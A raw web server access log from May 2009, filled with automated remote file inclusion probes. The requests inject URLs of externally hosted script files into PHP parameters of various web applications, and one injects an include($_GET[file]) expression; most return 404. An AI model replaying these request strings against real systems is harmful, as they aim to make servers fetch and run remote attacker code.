116.36.213.166 - - [30/May/2009:08:20:49 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 293 "-""Mozilla/5.0"
116.36.213.166 - - [30/May/2009:08:20:49 -0500] "GET /logs/access_log.1242518400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 320 "-""Mozilla/5.0"
116.36.213.166 - - [30/May/2009:08:20:52 -0500] "GET /logs/access_log.1238803200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 320 "-""Mozilla/5.0"
116.36.213.166 - - [30/May/2009:08:21:08 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 293 "-""Mozilla/5.0"
116.36.213.166 - - [30/May/2009:08:21:09 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 298 "-""Mozilla/5.0"
116.36.213.166 - - [30/May/2009:08:21:09 -0500] "GET /logs/access_log.1242518400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 320 "-""Mozilla/5.0"
116.36.213.166 - - [30/May/2009:08:21:15 -0500] "GET /logs/access_log.1238803200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 320 "-""Mozilla/5.0"
210.48.158.168 - - [30/May/2009:08:28:06 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.808"
210.48.158.168 - - [30/May/2009:08:28:07 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.808"
85.10.128.219 - - [30/May/2009:08:30:00 -0500] "GET ////common/init.php?CFG[CDIR]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
85.10.128.219 - - [30/May/2009:08:30:05 -0500] "GET /logs////common/init.php?CFG[CDIR]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
85.10.128.219 - - [30/May/2009:08:30:05 -0500] "GET /logs/access_log.1238112000////common/init.php?CFG[CDIR]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
85.10.128.219 - - [30/May/2009:08:30:05 -0500] "GET /logs/access_log.1239494400////common/init.php?CFG[CDIR]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
222.239.76.25 - - [30/May/2009:08:31:32 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
222.239.76.25 - - [30/May/2009:08:31:32 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
222.239.76.25 - - [30/May/2009:08:31:32 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
222.239.76.25 - - [30/May/2009:08:31:32 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
65.55.208.142 - - [30/May/2009:08:31:40 -0500] "GET /logs/access_log.1161993600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
61.109.250.29 - - [30/May/2009:08:33:16 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
61.109.250.29 - - [30/May/2009:08:33:16 -0500] "GET /logs/access_log.1239062400//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
61.109.250.29 - - [30/May/2009:08:33:31 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
61.109.250.29 - - [30/May/2009:08:33:35 -0500] "GET /logs/access_log.1239062400//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
61.109.250.29 - - [30/May/2009:08:33:35 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
88.191.103.144 - - [30/May/2009:08:35:20 -0500] "GET /logs//admin/include/lib.module.php?mod_root=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
88.191.103.144 - - [30/May/2009:08:35:20 -0500] "GET //admin/include/lib.module.php?mod_root=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
88.191.103.144 - - [30/May/2009:08:35:20 -0500] "GET /logs/access_log.1241222400//admin/include/lib.module.php?mod_root=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.85.63.226 - - [30/May/2009:08:36:15 -0500] "GET /?sourcedir=http://www.eann.kr//idi.txt?%0D?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
219.85.63.226 - - [30/May/2009:08:36:20 -0500] "GET /logs/?sourcedir=http://www.eann.kr//idi.txt?%0D?? HTTP/1.1" 200 191349 "-""libwww-perl/5.805"
210.8.66.19 - - [30/May/2009:08:36:53 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
210.8.66.19 - - [30/May/2009:08:36:53 -0500] "GET /logs/access_log.1233619200//index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
210.8.66.19 - - [30/May/2009:08:36:53 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
210.8.66.19 - - [30/May/2009:08:36:53 -0500] "GET //index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
210.8.66.19 - - [30/May/2009:08:36:53 -0500] "GET //index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
210.8.66.19 - - [30/May/2009:08:36:53 -0500] "GET /logs/access_log.1233619200//index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.99.210.34 - - [30/May/2009:08:37:34 -0500] "GET /logs/xmlrpc.php HTTP/1.1" 404 298 "-""Mozilla/5.0"
65.99.210.34 - - [30/May/2009:08:37:34 -0500] "GET /xmlrpc.php HTTP/1.1" 404 293 "-""Mozilla/5.0"
65.99.210.34 - - [30/May/2009:08:37:37 -0500] "GET /logs/adxmlrpc.php HTTP/1.1" 404 300 "-""Mozilla/5.0"
65.99.210.34 - - [30/May/2009:08:37:37 -0500] "GET /adxmlrpc.php HTTP/1.1" 404 295 "-""Mozilla/5.0"
61.109.250.29 - - [30/May/2009:08:37:37 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.109.250.29 - - [30/May/2009:08:37:37 -0500] "GET /logs/access_log.1239062400//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
61.109.250.29 - - [30/May/2009:08:37:37 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
121.130.29.11 - - [30/May/2009:08:38:24 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
121.130.29.11 - - [30/May/2009:08:38:24 -0500] "GET /logs/access_log.1233878400//include/mail.inc.php?skin_board_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
121.130.29.11 - - [30/May/2009:08:38:24 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
121.130.29.11 - - [30/May/2009:08:38:28 -0500] "GET /logs/access_log.1233705600//include/mail.inc.php?skin_board_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
216.240.136.22 - - [30/May/2009:08:39:16 -0500] "GET /logs/index.php?pagina=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
216.240.136.22 - - [30/May/2009:08:39:16 -0500] "GET /index.php?pagina=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
213.239.221.37 - - [30/May/2009:08:39:34 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
213.239.221.37 - - [30/May/2009:08:39:34 -0500] "GET /logs/access_log.1233619200//index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
213.239.221.37 - - [30/May/2009:08:39:34 -0500] "GET //index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
118.127.17.214 - - [30/May/2009:08:39:54 -0500] "GET /logs/aidshttp://h4ck3d.wsnw.net/mic22.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
118.127.17.214 - - [30/May/2009:08:39:55 -0500] "GET /aidshttp://h4ck3d.wsnw.net/mic22.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
219.85.63.226 - - [30/May/2009:08:39:56 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.eann.kr//idi.txt?%0D?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
219.85.63.226 - - [30/May/2009:08:39:56 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.eann.kr//idi.txt?%0D?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
213.239.221.37 - - [30/May/2009:08:40:30 -0500] "GET /logs/access_log.1238889600//index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
213.239.221.37 - - [30/May/2009:08:40:33 -0500] "GET //index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
213.239.221.37 - - [30/May/2009:08:40:33 -0500] "GET /logs/access_log.1233619200//index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
213.239.221.37 - - [30/May/2009:08:40:33 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
59.24.49.35 - - [30/May/2009:08:40:37 -0500] "GET /logs/access_log.1233619200//index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
59.24.49.35 - - [30/May/2009:08:40:37 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
59.24.49.35 - - [30/May/2009:08:40:37 -0500] "GET //index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
59.24.49.35 - - [30/May/2009:08:40:58 -0500] "GET //index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
59.24.49.35 - - [30/May/2009:08:40:58 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
59.24.49.35 - - [30/May/2009:08:40:58 -0500] "GET /logs/access_log.1233619200//index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
213.239.221.37 - - [30/May/2009:08:41:11 -0500] "GET /logs/access_log.1238889600//index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.17.99.13 - - [30/May/2009:08:41:33 -0500] "GET //admin/include/lib.module.php?mod_root=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
216.17.99.13 - - [30/May/2009:08:41:33 -0500] "GET /logs//admin/include/lib.module.php?mod_root=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
216.17.99.13 - - [30/May/2009:08:41:33 -0500] "GET /logs/access_log.1241222400//admin/include/lib.module.php?mod_root=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
59.24.49.35 - - [30/May/2009:08:41:36 -0500] "GET /logs/access_log.1238889600//index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.55.117.34 - - [30/May/2009:08:41:41 -0500] "GET /logs//include/lib.inc.php?site_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
74.55.117.34 - - [30/May/2009:08:41:41 -0500] "GET //include/lib.inc.php?site_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
216.17.99.13 - - [30/May/2009:08:41:43 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
216.17.99.13 - - [30/May/2009:08:41:43 -0500] "GET //include/admin.lib.inc.php?site_path=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
216.17.99.13 - - [30/May/2009:08:41:43 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
59.24.49.35 - - [30/May/2009:08:41:45 -0500] "GET /logs/access_log.1238889600//index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.55.117.34 - - [30/May/2009:08:41:51 -0500] "GET /logs//include/lib.inc.php?site_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
74.55.117.34 - - [30/May/2009:08:41:51 -0500] "GET //include/lib.inc.php?site_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
118.45.190.166 - - [30/May/2009:08:42:29 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://empowermentassociates.net/images/wpThumbnails/mawar.txt????? HTTP/1.1" 404 298 "-""Mozilla/5.0"
118.45.190.166 - - [30/May/2009:08:42:29 -0500] "GET /logs/access_log.1242518400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://empowermentassociates.net/images/wpThumbnails/mawar.txt????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
118.45.190.166 - - [30/May/2009:08:42:29 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://empowermentassociates.net/images/wpThumbnails/mawar.txt????? HTTP/1.1" 404 293 "-""Mozilla/5.0"
118.45.190.166 - - [30/May/2009:08:42:37 -0500] "GET /logs/access_log.1238803200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://empowermentassociates.net/images/wpThumbnails/mawar.txt????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.122.179.44 - - [30/May/2009:08:43:29 -0500] "GET /logs/access_log.1233619200//index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.122.179.44 - - [30/May/2009:08:43:29 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.122.179.44 - - [30/May/2009:08:43:29 -0500] "GET //index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:08:44:34 -0500] "GET /logs/access_log.1234828800//include/lib.inc.php?site_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:08:44:34 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:08:44:34 -0500] "GET //include/lib.inc.php?site_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 303 "-""Mozilla/5.0"
222.122.179.44 - - [30/May/2009:08:44:38 -0500] "GET /logs/access_log.1238889600//index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:08:44:39 -0500] "GET /logs/access_log.1233878400//include/lib.inc.php?site_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
221.139.104.51 - - [30/May/2009:08:45:33 -0500] "GET //index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
221.139.104.51 - - [30/May/2009:08:45:33 -0500] "GET /logs/access_log.1233619200//index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
221.139.104.51 - - [30/May/2009:08:45:33 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
74.52.2.130 - - [30/May/2009:08:45:43 -0500] "GET /logs/admin/config_settings.tpl.php?include_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
74.52.2.130 - - [30/May/2009:08:45:43 -0500] "GET /logs/access_log.1238112000/admin/config_settings.tpl.php?include_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.52.2.130 - - [30/May/2009:08:45:43 -0500] "GET /admin/config_settings.tpl.php?include_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
74.52.2.130 - - [30/May/2009:08:46:04 -0500] "GET /admin/config_settings.tpl.php?include_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
74.52.2.130 - - [30/May/2009:08:46:04 -0500] "GET /logs/access_log.1238112000/admin/config_settings.tpl.php?include_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.52.2.130 - - [30/May/2009:08:46:05 -0500] "GET /logs/admin/config_settings.tpl.php?include_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
221.139.104.51 - - [30/May/2009:08:46:06 -0500] "GET /logs/access_log.1238889600//index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.17.99.13 - - [30/May/2009:08:48:03 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
221.139.104.51 - - [30/May/2009:08:49:00 -0500] "GET //index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
221.139.104.51 - - [30/May/2009:08:49:00 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
221.139.104.51 - - [30/May/2009:08:49:00 -0500] "GET /logs/access_log.1233619200//index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.208.140 - - [30/May/2009:08:49:27 -0500] "GET /logs/access_log.1179532800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.140 - - [30/May/2009:08:49:31 -0500] "GET /logs/access_log.1179964800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
121.130.29.11 - - [30/May/2009:08:50:39 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
121.130.29.11 - - [30/May/2009:08:50:39 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
121.130.29.11 - - [30/May/2009:08:50:39 -0500] "GET /logs/access_log.1242259200//include/mail.inc.php?skin_board_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
121.130.29.11 - - [30/May/2009:08:50:40 -0500] "GET /logs/access_log.1242172800//include/mail.inc.php?skin_board_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
221.139.104.51 - - [30/May/2009:08:52:05 -0500] "GET /logs/access_log.1238889600//index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.130.29.11 - - [30/May/2009:08:52:07 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
121.130.29.11 - - [30/May/2009:08:52:07 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
121.130.29.11 - - [30/May/2009:08:52:08 -0500] "GET /logs/access_log.1240531200//include/mail.inc.php?skin_board_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
121.130.29.11 - - [30/May/2009:08:52:27 -0500] "GET /logs/access_log.1241049600//include/mail.inc.php?skin_board_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
210.8.66.19 - - [30/May/2009:08:52:46 -0500] "GET /logs/access_log.1238889600//index.php?DOCUMENT_ROOT=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
118.127.17.214 - - [30/May/2009:08:54:34 -0500] "GET /logs/lolhttp://h4ck3d.wsnw.net/mic22.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
118.127.17.214 - - [30/May/2009:08:54:34 -0500] "GET /lolhttp://h4ck3d.wsnw.net/mic22.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
203.251.225.77 - - [30/May/2009:08:54:35 -0500] "GET /logs/access_log.1242172800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mysticrystals.com/ccp5/media/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
203.251.225.77 - - [30/May/2009:08:54:35 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mysticrystals.com/ccp5/media/fx29id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
203.251.225.77 - - [30/May/2009:08:54:35 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mysticrystals.com/ccp5/media/fx29id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
203.251.225.77 - - [30/May/2009:08:54:35 -0500] "GET /logs/access_log.1242518400//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mysticrystals.com/ccp5/media/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
93.187.232.76 - - [30/May/2009:08:55:47 -0500] "GET /logs//vwar/convert/mvcw.php?step=http://www.graal-plus.zp.ua//images/roxx.jpg??? HTTP/1.1" 404 310 "-""libwww-perl/5.808"
93.187.232.76 - - [30/May/2009:08:55:47 -0500] "GET //vwar/convert/mvcw.php?step=http://www.graal-plus.zp.ua//images/roxx.jpg??? HTTP/1.1" 404 305 "-""libwww-perl/5.808"
203.251.225.77 - - [30/May/2009:08:55:54 -0500] "GET /logs/access_log.1242000000//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mysticrystals.com/ccp5/media/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
203.251.225.77 - - [30/May/2009:08:56:07 -0500] "GET /logs/access_log.1240012800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.mysticrystals.com/ccp5/media/fx29id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
70.32.106.32 - - [30/May/2009:08:58:41 -0500] "GET /logs///classes/adodbt/sql.php?classes_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt%0D?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
70.32.106.32 - - [30/May/2009:08:58:41 -0500] "GET ///classes/adodbt/sql.php?classes_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt%0D?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
205.234.132.157 - - [30/May/2009:08:59:20 -0500] "GET /logs///classes/adodbt/sql.php?classes_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
205.234.132.157 - - [30/May/2009:08:59:20 -0500] "GET ///classes/adodbt/sql.php?classes_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
200.142.148.142 - - [30/May/2009:09:02:18 -0500] "GET /logs/access_log.1233964800/environment.php?DIR_PREFIX=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
